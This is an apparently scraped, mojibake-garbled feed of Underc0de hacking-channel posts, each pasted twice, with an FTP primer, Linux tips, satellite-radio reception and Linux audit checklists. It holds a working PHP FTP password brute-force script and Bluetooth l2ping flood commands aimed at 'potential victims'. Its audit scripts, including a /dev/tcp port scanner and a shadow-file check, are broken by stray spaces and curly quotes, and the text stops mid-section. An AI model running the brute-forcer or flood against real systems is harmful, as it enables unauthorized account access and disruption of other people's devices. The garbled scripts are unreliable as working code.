β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ FTP BRUTEFORCE CODE :
t.me/UndercOdeTesting
function ftpbruter() {
#DEFINA AQUI AS VARIΓVEIS PARA O ATAQUE
$user = 'ftptest';
$host = '192.168.0.102';
$passlist = file_get_contents('passtest.txt');
$port = 21;
$timeout = 50;
$passes = explode("\n", $passlist);
$i = 1;
foreach ($passes as $pass) {
error_reporting(0);
echo "[*] Testando " . $user . " && " . $pass . "\n";
$con = ftp_connect($host, $port, $timeout);
$login = ftp_login($con, $user, $pass);
if (!$login) {
ftp_close($con);
$i++;
} else {
echo "Password encontrado\n";
echo "Efetuadas " . $i . " tentativas\n";
echo "User: " . $user . " Password: " . $pass . "\n";
break;
}
}
}
ftpbruter();
@UndercodeOfficial
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ FTP BRUTEFORCE CODE :
t.me/UndercOdeTesting
function ftpbruter() {
#DEFINA AQUI AS VARIΓVEIS PARA O ATAQUE
$user = 'ftptest';
$host = '192.168.0.102';
$passlist = file_get_contents('passtest.txt');
$port = 21;
$timeout = 50;
$passes = explode("\n", $passlist);
$i = 1;
foreach ($passes as $pass) {
error_reporting(0);
echo "[*] Testando " . $user . " && " . $pass . "\n";
$con = ftp_connect($host, $port, $timeout);
$login = ftp_login($con, $user, $pass);
if (!$login) {
ftp_close($con);
$i++;
} else {
echo "Password encontrado\n";
echo "Efetuadas " . $i . " tentativas\n";
echo "User: " . $user . " Password: " . $pass . "\n";
break;
}
}
}
ftpbruter();
@UndercodeOfficial
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ What is ftp for beginers:
instagram.com/UndercOdeTestingCompany
1) FTP is a way to transfer files online. You might think of the sites you visit in your browser as βthe internet,β but your browser only uses one protocol: HTTP.
2) There are many others protocols that, collectively, make up the internet. IMAP and POP, for instance, are two protocols that email clients use to send and receive messages.
3) XMPP is a protocol used to send and receive instant messages. FTP is another such protocol.
4) FTP stands for βFile Transfer Protocol.β Itβs also one of the oldest protocols in use today, and is a convenient way to move files around. An FTP server offers access to a directory, with sub-directories. Users connect to these servers with an FTP client, a piece of software that lets you download files from the server, as well as upload files to it.
5) Many internet users will never have any use for FTP, but if youβre building a website, itβs an essential tool. And because itβs such a fundamental tool on the web, itβs worth knowing about even if youβre not a developer. So, hereβs everything the average internet user needs to know about FTP and how to use it.
@UndercOdeOfficial
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ What is ftp for beginers:
instagram.com/UndercOdeTestingCompany
1) FTP is a way to transfer files online. You might think of the sites you visit in your browser as βthe internet,β but your browser only uses one protocol: HTTP.
2) There are many others protocols that, collectively, make up the internet. IMAP and POP, for instance, are two protocols that email clients use to send and receive messages.
3) XMPP is a protocol used to send and receive instant messages. FTP is another such protocol.
4) FTP stands for βFile Transfer Protocol.β Itβs also one of the oldest protocols in use today, and is a convenient way to move files around. An FTP server offers access to a directory, with sub-directories. Users connect to these servers with an FTP client, a piece of software that lets you download files from the server, as well as upload files to it.
5) Many internet users will never have any use for FTP, but if youβre building a website, itβs an essential tool. And because itβs such a fundamental tool on the web, itβs worth knowing about even if youβre not a developer. So, hereβs everything the average internet user needs to know about FTP and how to use it.
@UndercOdeOfficial
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ This includes both the tricks we talked about earlier and the new ones-linux
instagram.com/UndercOdeTestingCompany
π¦ ππΌππ πππΈβπ :
1) Trick number 1
> $ sudo !!
Runs the previous command with root privileges.
Useful when you forget to write sudo. "!!" he captures the previous line.
2) Trick number 2
$ python -m SimpleHTTPServer
Launches a simple server directly in the Linux console to view the current directory as a web page. You can see it like this:
$ firefox http://$HOSTNAME:8000/
3) Trick number 3
$ ^foo^bar
Runs the previous command, but with a replacement.
It is convenient to apply if you make a typo. By default, the arguments are empty, so by running something like this:
$ echo "no typozs"
can easily fix with
$ ^z
4) Trick number 4
$fc
or
Ctrl + X + E
Opens a text editor to write a long command.
You can write at your discretion in vi, emacs, nano ... The key combination captures the written text and opens it in the editor specified in $ EDITOR.
5) Trick number 5
Alt +. or Esc +.
Inserts the last argument of the previous command. For example, if you wrote:
$ cp file.txt /var/www/proglib/
$ cd
and hit Alt +. then the line will become
$ cd /var/www/proglib/
Repeating this key combination substitutes arguments from older commands.
6) Trick number 6
$ mount | column -t
Lists all connected file systems in human form.
7) Trick number 7
$ echo "ls -l" | at midnight
Executes the given command at the appointed time.
8) Trick number 8
$curl ifconfig.me
Displays the global IP address. Also:
curl ifconfig.me/host -> Remote Host
curl ifconfig.me/ua ->User Agent
curl ifconfig.me/port -> Port
This works thanks to the ifconfig.me site.
9) Trick number 9
$ man ascii
Allows you to quickly see the Ascii character table.
10) Trick number 10
$ mount -t tmpfs tmpfs /mnt -o size=1024m
Mounts part of the RAM as a temporary partition in / mnt. Surely there is no point explaining the benefits of using RAM. Data will be saved until the next reboot or until
$ umount /mnt
11) Trick number 11
Ctrl-l
Just clears the terminal.
12) Trick number 12
$ disown -a && exit
Closes the terminal, leaving all running subprocesses to work.
13) Trick number 13
$ mv filename.{old,new}
A quick way to rename a file
14) Trick number 14
$ pushd /tmp
Adds a directory to the stack to return to the current one afterwards. For instance:
$ cd /complicated/path/.I/dont/want/to/forget
$ pushd /tmp
$ cd thing/in/tmp
$ popd
You are back on horseback in /complicated/path/.I/dont/want/to/forget.
15) Trick number 15
$ rm !(*.foo|*.bar|*.baz)
Deletes all files that do not have the specified extension.
16) Trick number 16
And finally:
$ telnet towel.blinkenlights.nl
Written by Underc0de
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ This includes both the tricks we talked about earlier and the new ones-linux
instagram.com/UndercOdeTestingCompany
π¦ ππΌππ πππΈβπ :
1) Trick number 1
> $ sudo !!
Runs the previous command with root privileges.
Useful when you forget to write sudo. "!!" he captures the previous line.
2) Trick number 2
$ python -m SimpleHTTPServer
Launches a simple server directly in the Linux console to view the current directory as a web page. You can see it like this:
$ firefox http://$HOSTNAME:8000/
3) Trick number 3
$ ^foo^bar
Runs the previous command, but with a replacement.
It is convenient to apply if you make a typo. By default, the arguments are empty, so by running something like this:
$ echo "no typozs"
can easily fix with
$ ^z
4) Trick number 4
$fc
or
Ctrl + X + E
Opens a text editor to write a long command.
You can write at your discretion in vi, emacs, nano ... The key combination captures the written text and opens it in the editor specified in $ EDITOR.
5) Trick number 5
Alt +. or Esc +.
Inserts the last argument of the previous command. For example, if you wrote:
$ cp file.txt /var/www/proglib/
$ cd
and hit Alt +. then the line will become
$ cd /var/www/proglib/
Repeating this key combination substitutes arguments from older commands.
6) Trick number 6
$ mount | column -t
Lists all connected file systems in human form.
7) Trick number 7
$ echo "ls -l" | at midnight
Executes the given command at the appointed time.
8) Trick number 8
$curl ifconfig.me
Displays the global IP address. Also:
curl ifconfig.me/host -> Remote Host
curl ifconfig.me/ua ->User Agent
curl ifconfig.me/port -> Port
This works thanks to the ifconfig.me site.
9) Trick number 9
$ man ascii
Allows you to quickly see the Ascii character table.
10) Trick number 10
$ mount -t tmpfs tmpfs /mnt -o size=1024m
Mounts part of the RAM as a temporary partition in / mnt. Surely there is no point explaining the benefits of using RAM. Data will be saved until the next reboot or until
$ umount /mnt
11) Trick number 11
Ctrl-l
Just clears the terminal.
12) Trick number 12
$ disown -a && exit
Closes the terminal, leaving all running subprocesses to work.
13) Trick number 13
$ mv filename.{old,new}
A quick way to rename a file
14) Trick number 14
$ pushd /tmp
Adds a directory to the stack to return to the current one afterwards. For instance:
$ cd /complicated/path/.I/dont/want/to/forget
$ pushd /tmp
$ cd thing/in/tmp
$ popd
You are back on horseback in /complicated/path/.I/dont/want/to/forget.
15) Trick number 15
$ rm !(*.foo|*.bar|*.baz)
Deletes all files that do not have the specified extension.
16) Trick number 16
And finally:
$ telnet towel.blinkenlights.nl
Written by Underc0de
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ buetooth hack :
> If modern Wi-Fi routers are capable of filtering out unwanted packets, then most Bluetooth adapters are, to say the least, blunt. By and large, they do not care what package and how much, and even more so how many of these packages you send.
> Therefore, it is absolutely easy for us to increase the information volume of the ping package in Linux to a huge value, and then send these packages to the device with Bluetooth, say, 1000 pieces.
> Now in order. First we need to find the right devices in range. To do this, use those command :
pinterest.com/UndercOdeOfficial
π¦ ππΌππ πππΈβπ :
1) $ hcitool scan
As a result of this simple manipulation, you will get a list of available devices with Bluetooth from their MAC address. If your system does not see the Bluetooth adapter, then I recommend installing one of the Bluetooth managers for Linux. In Kali, gnome-bluetooth approached me personally, which can be installed with the following command:
2) $ apt-get install gnome-bluetooth
You can also use the blueman utility:
3) $ apt-get install blueman
Having received a list of potential victims, you can deal with their blue-tooth devices in several ways. Let's consider each separately.
4) The first way: l2ping
We use the following command:
> $ l2ping -i hci0 -s <packet value> -f <MAC_address>
5) It will generate packets specified by you in the <packet value>volume parameter and will send these packets to the MAC address recorded as a parameter <MAC_address>. In the end, you will see this picture: in the terminal, the response time will gradually increase, and on the attacked device, most likely, Bluetooth will simply turn off. After some time, it will turn on anyway, but the music will be interrupted, and some satisfaction will be received.
Written by Underc0de
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ buetooth hack :
> If modern Wi-Fi routers are capable of filtering out unwanted packets, then most Bluetooth adapters are, to say the least, blunt. By and large, they do not care what package and how much, and even more so how many of these packages you send.
> Therefore, it is absolutely easy for us to increase the information volume of the ping package in Linux to a huge value, and then send these packages to the device with Bluetooth, say, 1000 pieces.
> Now in order. First we need to find the right devices in range. To do this, use those command :
pinterest.com/UndercOdeOfficial
π¦ ππΌππ πππΈβπ :
1) $ hcitool scan
As a result of this simple manipulation, you will get a list of available devices with Bluetooth from their MAC address. If your system does not see the Bluetooth adapter, then I recommend installing one of the Bluetooth managers for Linux. In Kali, gnome-bluetooth approached me personally, which can be installed with the following command:
2) $ apt-get install gnome-bluetooth
You can also use the blueman utility:
3) $ apt-get install blueman
Having received a list of potential victims, you can deal with their blue-tooth devices in several ways. Let's consider each separately.
4) The first way: l2ping
We use the following command:
> $ l2ping -i hci0 -s <packet value> -f <MAC_address>
5) It will generate packets specified by you in the <packet value>volume parameter and will send these packets to the MAC address recorded as a parameter <MAC_address>. In the end, you will see this picture: in the terminal, the response time will gradually increase, and on the attacked device, most likely, Bluetooth will simply turn off. After some time, it will turn on anyway, but the music will be interrupted, and some satisfaction will be received.
Written by Underc0de
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Satellite Hacking by Underc0de :
fb.com/UndercOdetestingCompany
1) Today I will show how to receive and decode signals from space. Not, of course, as contactees and fans of caps made of foil do, but in all seriousness.
2) the so-called L-Band - a frequency range from 1 to 2 GHz, which is actively used for communication with satellites.
3) Reception of the L-Band range is not something radically new for hams. But before it was not easy. It was necessary to calculate and make an antenna, solder a low-noise amplifier (because the signals from the satellite are very weak), then set it all up. In addition, the devices for this lesson cost a lot of money.
π¦ ππΌππ πππΈβπ :
1) Now everything has become much simpler and cheaper: you can meet the $ 100 per antenna with the receiver. As for the satellites themselves, we will consider two systems: Iridium and Inmarsat . They are interesting in that they are existing communication systems and you can βliveβ see how they work. Moreover, for these systems there are software decoders that you can run, study the sources on GitHub.
2) Iron
A kit for receiving satellite signals consists of three main components: a receiver, an antenna, and a low noise amplifier (LNA, Low Noise Amplifier).
3) Receiver
Let's start with the receiver. There are three main options.
π¦ Option 1 - RTL-SDR V3
This is a classic of the genre, one of the best and proven low-cost receivers based on the famous RTL-SDR. The receiver provides operation at frequencies up to 1.7 GHz and a 2 MHz bandwidth. The price of the receiver is about $ 30, along with an antenna and a mini tripod (it is also useful on the farm).
RTL-SDR V3
RTL-SDR V3
> It is important to take the original model: AliExpress has cheaper clones, but, firstly, their quality is not guaranteed, and secondly, the receiver must have the ability to supply power to the antenna input (bias tee), otherwise it wonβt work.
π¦ Option 2: Nooelec NESDR SMArTee v2
This receiver is approximately comparable in characteristics to the previous one, it has a non-disconnectable bias tee, and for satellite reception it can be convenient. It is advisable to choose the second version, because the first has a lower maximum output current (250 mA versus 100). This is important: some LNAs (e.g. Nooelec SAWbird) consume about 180 mA.
NESDR SMArTee v2
NESDR SMArTee v2
There is another model Nooelec NESDR SMArt, without Tee in the name, it does not fit.
π¦ Option 3 - SDRplay RSPduo
This is a better receiver, which provides a reception bandwidth of up to 8 MHz, which is much more convenient for signal search. The ADC itself also has a large bit depth (12 bits instead of 8), which is better for receiving weak signals.
Written by Underc0de
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Satellite Hacking by Underc0de :
fb.com/UndercOdetestingCompany
1) Today I will show how to receive and decode signals from space. Not, of course, as contactees and fans of caps made of foil do, but in all seriousness.
2) the so-called L-Band - a frequency range from 1 to 2 GHz, which is actively used for communication with satellites.
3) Reception of the L-Band range is not something radically new for hams. But before it was not easy. It was necessary to calculate and make an antenna, solder a low-noise amplifier (because the signals from the satellite are very weak), then set it all up. In addition, the devices for this lesson cost a lot of money.
π¦ ππΌππ πππΈβπ :
1) Now everything has become much simpler and cheaper: you can meet the $ 100 per antenna with the receiver. As for the satellites themselves, we will consider two systems: Iridium and Inmarsat . They are interesting in that they are existing communication systems and you can βliveβ see how they work. Moreover, for these systems there are software decoders that you can run, study the sources on GitHub.
2) Iron
A kit for receiving satellite signals consists of three main components: a receiver, an antenna, and a low noise amplifier (LNA, Low Noise Amplifier).
3) Receiver
Let's start with the receiver. There are three main options.
π¦ Option 1 - RTL-SDR V3
This is a classic of the genre, one of the best and proven low-cost receivers based on the famous RTL-SDR. The receiver provides operation at frequencies up to 1.7 GHz and a 2 MHz bandwidth. The price of the receiver is about $ 30, along with an antenna and a mini tripod (it is also useful on the farm).
RTL-SDR V3
RTL-SDR V3
> It is important to take the original model: AliExpress has cheaper clones, but, firstly, their quality is not guaranteed, and secondly, the receiver must have the ability to supply power to the antenna input (bias tee), otherwise it wonβt work.
π¦ Option 2: Nooelec NESDR SMArTee v2
This receiver is approximately comparable in characteristics to the previous one, it has a non-disconnectable bias tee, and for satellite reception it can be convenient. It is advisable to choose the second version, because the first has a lower maximum output current (250 mA versus 100). This is important: some LNAs (e.g. Nooelec SAWbird) consume about 180 mA.
NESDR SMArTee v2
NESDR SMArTee v2
There is another model Nooelec NESDR SMArt, without Tee in the name, it does not fit.
π¦ Option 3 - SDRplay RSPduo
This is a better receiver, which provides a reception bandwidth of up to 8 MHz, which is much more convenient for signal search. The ADC itself also has a large bit depth (12 bits instead of 8), which is better for receiving weak signals.
Written by Underc0de
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Security Express Audit Scripts for Linux (ITGC)
Verification of accounts
twitter.com/UndercodeTC
π¦ ππΌππ πππΈβπ :
1) List all users.
The user list is stored in the / etc / passwdfile file. To get a list of users, you can use the following script:
bin / bash
# userslistinthesystem.sh
# count and Lists existing βrealβ users in the system.
echo
echo β[*] Existing users (sorted alphabetically):β
echo
grep '/ bin / bash' / etc / passwd | grep -v 'root' | cut -f1
-d ':' | sort
echo
echo -n β[*] Number of real users found:β
grep '/ bin / bash' / etc / passwd | grep -v 'root' | wc -l
echo
2) List the blocked accounts
During the audit, you need to check the list of blocked and unblocked users ( accountName ). The following command is suitable for this:
#! / bin / bash
echo
# passwd βs accountName
3) View statistics for all users
The auditor must ensure that the ac command is enabled on the system to review user activity:
#! / bin / bash
# ac
To view the activity of a user connection session with totals for each day, use the command:
#! / bin / bash
# ac -d
To display information about the session activity (in hours) of the user connection βuserβ :
#! / bin / bash
# ac user
4) Viewing user activity
System applications psacct or acct work in the background and track the activity of each user in the system, as well as the resources consumed by him. To check the activity of users in the system, run the following script:
#! / usr / bin / envksh
last -Fa | awk '
/ wtmp begins / {next; }
/ still logged in / {next; }
$ 0 == reboot {next; }
NF> 0 {
if (NR> 1)
printf (β
β);
printf (βUser: t% s
β, $ 1); # user
printf (βStart: t% s% s% s% s
β, $ 3, $ 4, $ 5, $ 6);
if ($ 9 == βdownβ)
printf (βEnd: tshutdown
β);
else
printf (βEnd: t% s% s% s% s
β, $ 9, $ 10, $ 11, $ 12);
if ( substr ($ NF, 1, 1) == β(β)
{
t = $ NF;
h = βlocalhostβ;
}
else
{
t = $ (NF-1);
h = $ NF;
}
gsub (β[()]β, ββ, t);
printf (βTime On: t% s
β, t);
printf (βRemote Host: t% s
β, h);
} '
Written by Underc0de
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Security Express Audit Scripts for Linux (ITGC)
Verification of accounts
twitter.com/UndercodeTC
π¦ ππΌππ πππΈβπ :
1) List all users.
The user list is stored in the / etc / passwdfile file. To get a list of users, you can use the following script:
bin / bash
# userslistinthesystem.sh
# count and Lists existing βrealβ users in the system.
echo
echo β[*] Existing users (sorted alphabetically):β
echo
grep '/ bin / bash' / etc / passwd | grep -v 'root' | cut -f1
-d ':' | sort
echo
echo -n β[*] Number of real users found:β
grep '/ bin / bash' / etc / passwd | grep -v 'root' | wc -l
echo
2) List the blocked accounts
During the audit, you need to check the list of blocked and unblocked users ( accountName ). The following command is suitable for this:
#! / bin / bash
echo
# passwd βs accountName
3) View statistics for all users
The auditor must ensure that the ac command is enabled on the system to review user activity:
#! / bin / bash
# ac
To view the activity of a user connection session with totals for each day, use the command:
#! / bin / bash
# ac -d
To display information about the session activity (in hours) of the user connection βuserβ :
#! / bin / bash
# ac user
4) Viewing user activity
System applications psacct or acct work in the background and track the activity of each user in the system, as well as the resources consumed by him. To check the activity of users in the system, run the following script:
#! / usr / bin / envksh
last -Fa | awk '
/ wtmp begins / {next; }
/ still logged in / {next; }
$ 0 == reboot {next; }
NF> 0 {
if (NR> 1)
printf (β
β);
printf (βUser: t% s
β, $ 1); # user
printf (βStart: t% s% s% s% s
β, $ 3, $ 4, $ 5, $ 6);
if ($ 9 == βdownβ)
printf (βEnd: tshutdown
β);
else
printf (βEnd: t% s% s% s% s
β, $ 9, $ 10, $ 11, $ 12);
if ( substr ($ NF, 1, 1) == β(β)
{
t = $ NF;
h = βlocalhostβ;
}
else
{
t = $ (NF-1);
h = $ NF;
}
gsub (β[()]β, ββ, t);
printf (βTime On: t% s
β, t);
printf (βRemote Host: t% s
β, h);
} '
Written by Underc0de
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Checking the password policy :
1) Accounts with an empty password
During the audit, you need to make sure that the system does not have or has blocked accounts that allow you to enter the system without entering a password. This rule can be checked with the command:
# cat / etc / shadow | awk -F: ($ 2 == ββ) {print $ 1} '
2) Password complexity check
During the audit, it is necessary to check the password complexity settings in order to reduce the risk of password attacks using brute force (brute force) or dictionary matching. To set this rule in the system you must use authentication plugins (PAM).
The auditor can check the corresponding setting in the configuration file:
# vi /etc/pam.d/system-auth
3) Checking the password age
During the audit, you need to check the password expiration setting. To check the password expiration, use the change command . This command displays detailed information about the password expiration date, as well as the date it was last changed.
The following command is used to view information about the βageβ of passwords:
#chage -l username
To change the password expiration time for a specific user, use the commands listed below:
#chage -M 60 username
#chage -M 60 -m 7 -W 7 userName
Parameters ( to set the password expiration date):
-M - maximum validity period in days.
-m is the minimum validity in days.
-W - setting the warning in days.
4) Using duplicate passwords
The authorization settings in the system must comply with the password policy. The file containing the password history is located in / etc / security / opasswd. For verification, you must perform the following steps:
for RHEL: open the file '/etc/pam.d/system-auth':
# vi /etc/pam.d/system-auth
for Ubuntu / Debian / Linux Mint: open the file '/ etc /pam.d/common-password ':
# vi /etc/pam.d/common-password
Add the following line to the' auth 'section:
auth sufficient pam_unix.so likeauthnullok
To prevent the last six passwords from being used, add the following line:
Password sufficient pam_unix. so nullokuse_authtok md5 shadow remember = 6
After executing the command, the system will store a history of the previous six passwords, and if any user tries to update the password using any of the last six, he will receive an error message.
5) Secure connection settings
Remote connection protocols to the Telnet and Rlogin system are very old and vulnerable, due to the transmission of the password over the network in unencrypted form. For dedicated and secure connections, the Secure Shell (SSH) protocol must be used . The auditor also needs to make sure that the root login option is disabled, the default SSH port is changed, remote access is allowed only for specific authorized users. Checked settings are located in the SSH configuration file:
> # vi / etc / ssh / sshd_config
6) Logging on as root (root login)
During the audit, the auditor should check the prohibition of remote login with root privileges.
# PermitRootLogin = yes
7) Verification of SSH service account login
During the audit, the auditor should check the service account with a passwordless SSH login value. Typically, system administrators use this feature for programmed backups, transferring files, and running scripts in remote control mode.
Check your sshd_config settings (/ etc / ssh / sshd_config) are correct one last time.
# PermitRootLogin without-password
# RSAAuthentication = yes
# PubkeyAuthentication = yes
8) Checking access lists in Denyhosts and Fail2ban
During the audit, you need to check the settings of the DenyHosts and Fail2ban access lists . These are scripts used to monitor and analyze SSH access logs and to protect against attacks by brute force passwords.
π¦ Features DenyHosts:
saves and tracks the logs from the / var / log / secure file , noting all successful and unsuccessful login attempts, and filters them.
monitors failed login attempts
sends an email notification of blocked hosts and suspicious login attempts
1) Features of Fail2ban:
π¦ Checking the password policy :
1) Accounts with an empty password
During the audit, you need to make sure that the system does not have or has blocked accounts that allow you to enter the system without entering a password. This rule can be checked with the command:
# cat / etc / shadow | awk -F: ($ 2 == ββ) {print $ 1} '
2) Password complexity check
During the audit, it is necessary to check the password complexity settings in order to reduce the risk of password attacks using brute force (brute force) or dictionary matching. To set this rule in the system you must use authentication plugins (PAM).
The auditor can check the corresponding setting in the configuration file:
# vi /etc/pam.d/system-auth
3) Checking the password age
During the audit, you need to check the password expiration setting. To check the password expiration, use the change command . This command displays detailed information about the password expiration date, as well as the date it was last changed.
The following command is used to view information about the βageβ of passwords:
#chage -l username
To change the password expiration time for a specific user, use the commands listed below:
#chage -M 60 username
#chage -M 60 -m 7 -W 7 userName
Parameters ( to set the password expiration date):
-M - maximum validity period in days.
-m is the minimum validity in days.
-W - setting the warning in days.
4) Using duplicate passwords
The authorization settings in the system must comply with the password policy. The file containing the password history is located in / etc / security / opasswd. For verification, you must perform the following steps:
for RHEL: open the file '/etc/pam.d/system-auth':
# vi /etc/pam.d/system-auth
for Ubuntu / Debian / Linux Mint: open the file '/ etc /pam.d/common-password ':
# vi /etc/pam.d/common-password
Add the following line to the' auth 'section:
auth sufficient pam_unix.so likeauthnullok
To prevent the last six passwords from being used, add the following line:
Password sufficient pam_unix. so nullokuse_authtok md5 shadow remember = 6
After executing the command, the system will store a history of the previous six passwords, and if any user tries to update the password using any of the last six, he will receive an error message.
5) Secure connection settings
Remote connection protocols to the Telnet and Rlogin system are very old and vulnerable, due to the transmission of the password over the network in unencrypted form. For dedicated and secure connections, the Secure Shell (SSH) protocol must be used . The auditor also needs to make sure that the root login option is disabled, the default SSH port is changed, remote access is allowed only for specific authorized users. Checked settings are located in the SSH configuration file:
> # vi / etc / ssh / sshd_config
6) Logging on as root (root login)
During the audit, the auditor should check the prohibition of remote login with root privileges.
# PermitRootLogin = yes
7) Verification of SSH service account login
During the audit, the auditor should check the service account with a passwordless SSH login value. Typically, system administrators use this feature for programmed backups, transferring files, and running scripts in remote control mode.
Check your sshd_config settings (/ etc / ssh / sshd_config) are correct one last time.
# PermitRootLogin without-password
# RSAAuthentication = yes
# PubkeyAuthentication = yes
8) Checking access lists in Denyhosts and Fail2ban
During the audit, you need to check the settings of the DenyHosts and Fail2ban access lists . These are scripts used to monitor and analyze SSH access logs and to protect against attacks by brute force passwords.
π¦ Features DenyHosts:
saves and tracks the logs from the / var / log / secure file , noting all successful and unsuccessful login attempts, and filters them.
monitors failed login attempts
sends an email notification of blocked hosts and suspicious login attempts
1) Features of Fail2ban:
2) Saves and tracks logs from the files / var / log / secure and /var/log/auth.log , / var / log / pwdfail
highly customizable and multithreaded
monitors log files on a regular basis
Written by Underc0de
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
highly customizable and multithreaded
monitors log files on a regular basis
Written by Underc0de
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Checking the system logs :
During the audit, you need to make sure that the daemon is running Syslog , and all significant events occurring in the system are recorded in event logs. During the audit, it is also necessary to make sure that the policy for storing event logs takes into account the requirements of current legislation and the security policy
instagram.com/UndercOdeTestingCompany
π¦ ππΌππ πππΈβπ :
1) Event logs on Linux:
/var/log/auth.log - log of the authorization system (logins and authentication mechanism).
/var/log/dpkg.log - install / uninstall packages log using dpkg.
/var/log/yum.log - package installation / removal log using yum.
/ var / log / faillog - a log of unsuccessful login attempts and their limit for each account.
/var/log/kern.log - kernel log, (a detailed log of messages from the Linux kernel).
/ var / log / maillog or /var/log/mail.log - mail server log.
/ var / log / wtmp - log-in system (registration time and duration of all users of the system).
/ var / run / utmp - information about the users currently logged in to the system.
/ var / log / lastlog - records of previous logins.
/ var / log / boot - information that is logged during system boot
2) Protecting system files
> GRUB bootloader protection
To protect the GRUB bootloader, the administrator must use password encryption in MD5 format :
[root @ machine ~] # grub-md5-crypt
3) After executing the command, the administrator needs to open the file /boot/grub/menu.lst or /boot/grub/grub.conf and add the MD5 password:
[root @ machine ~] # vi /boot/grub/menu.lst
or
[root @ machine ~] # vi /boot/grub/grub.conf
4) The newly created MD5 password can be added to the GRUB configuration file.
5) Protecting the boot directory / BOOT
During the audit, it is necessary to check the status of the / boot directory , since the kernel of the system and related files are located in the / boot directory . You need to make sure that this directory is allowed read-only access, which prevents unauthorized changes to important files in the system. To check, open the / etc / fstab file and check the configuration:
# vi / etc / fstab
6) The file should contain the line:
LABEL = / boot / boot ext2 defaults, ro 1 2
7) Checking open ports and active connections
The following script can be used to check services running on the system:
#! / bin / bash
if (($ (ps -ef | grep -v grep | grep $ service | wc -l)> 0))
then
echo β$ service is running !!!β
else
/etc/init.d/$service start
Fi
π¦ View network connections
# netstat -anop
or
# lsof -i (lsof -ni)
or
# iptraf
8) Listened ports
Using the Netstat command, you can view all open ports and their associated commands. Example script:
# netstat β tulpn
A script for port scanning is:
scan () {
if [[-z $ 1 || -z $ 2]]; then
echo βUsage: $ 0 <host> <port, ports, or port-range>β
return
fi
local host = $ 1
local ports = ()
case $ 2 in
* - *)
IFS = - read start end <<< β$ 2β
for ((port = start; port <= end; port ++)); do
ports + = ($ port)
done
;;
*, *)
IFS =, read -ra ports <<< β$ 2β
;; *)
ports + = ($ 2) ;;
esac
for port in β$ {ports [@]}β; do
alarm 1 βecho> / dev / tcp / $ host / $ portβ &&
echo βport $ port is openβ ||
echo βport $ port is closedβ
done
}
9) iptables firewall
During the audit, it is necessary to check the configuration of the Linux firewall to prevent unauthorized access. To control traffic, rules should be created in iptables that will filter incoming, outgoing and forwarded packets taking into account the IP address and TCP / UDP port number.
# iptables -n -L -v --line-numbers
ICMP / broadcast requests
10) During the audit, you must verify that the systems are configured to ignore ping and broadcast requests. To do this, make sure that the following lines are added to the β/etc/sysctl.confβ file :
# ignore ICMP requests:
net.ipv4.icmp_echo_ignore_all = 1
# ignore broadcast requests:
net.ipv4.icmp_echo_ignore_broadcasts = 1
11) Checking installed updates
The latest updates must be installed on the systems:
# yum updates
# yum check-update
π¦ Checking the system logs :
During the audit, you need to make sure that the daemon is running Syslog , and all significant events occurring in the system are recorded in event logs. During the audit, it is also necessary to make sure that the policy for storing event logs takes into account the requirements of current legislation and the security policy
instagram.com/UndercOdeTestingCompany
π¦ ππΌππ πππΈβπ :
1) Event logs on Linux:
/var/log/auth.log - log of the authorization system (logins and authentication mechanism).
/var/log/dpkg.log - install / uninstall packages log using dpkg.
/var/log/yum.log - package installation / removal log using yum.
/ var / log / faillog - a log of unsuccessful login attempts and their limit for each account.
/var/log/kern.log - kernel log, (a detailed log of messages from the Linux kernel).
/ var / log / maillog or /var/log/mail.log - mail server log.
/ var / log / wtmp - log-in system (registration time and duration of all users of the system).
/ var / run / utmp - information about the users currently logged in to the system.
/ var / log / lastlog - records of previous logins.
/ var / log / boot - information that is logged during system boot
2) Protecting system files
> GRUB bootloader protection
To protect the GRUB bootloader, the administrator must use password encryption in MD5 format :
[root @ machine ~] # grub-md5-crypt
3) After executing the command, the administrator needs to open the file /boot/grub/menu.lst or /boot/grub/grub.conf and add the MD5 password:
[root @ machine ~] # vi /boot/grub/menu.lst
or
[root @ machine ~] # vi /boot/grub/grub.conf
4) The newly created MD5 password can be added to the GRUB configuration file.
5) Protecting the boot directory / BOOT
During the audit, it is necessary to check the status of the / boot directory , since the kernel of the system and related files are located in the / boot directory . You need to make sure that this directory is allowed read-only access, which prevents unauthorized changes to important files in the system. To check, open the / etc / fstab file and check the configuration:
# vi / etc / fstab
6) The file should contain the line:
LABEL = / boot / boot ext2 defaults, ro 1 2
7) Checking open ports and active connections
The following script can be used to check services running on the system:
#! / bin / bash
if (($ (ps -ef | grep -v grep | grep $ service | wc -l)> 0))
then
echo β$ service is running !!!β
else
/etc/init.d/$service start
Fi
π¦ View network connections
# netstat -anop
or
# lsof -i (lsof -ni)
or
# iptraf
8) Listened ports
Using the Netstat command, you can view all open ports and their associated commands. Example script:
# netstat β tulpn
A script for port scanning is:
scan () {
if [[-z $ 1 || -z $ 2]]; then
echo βUsage: $ 0 <host> <port, ports, or port-range>β
return
fi
local host = $ 1
local ports = ()
case $ 2 in
* - *)
IFS = - read start end <<< β$ 2β
for ((port = start; port <= end; port ++)); do
ports + = ($ port)
done
;;
*, *)
IFS =, read -ra ports <<< β$ 2β
;; *)
ports + = ($ 2) ;;
esac
for port in β$ {ports [@]}β; do
alarm 1 βecho> / dev / tcp / $ host / $ portβ &&
echo βport $ port is openβ ||
echo βport $ port is closedβ
done
}
9) iptables firewall
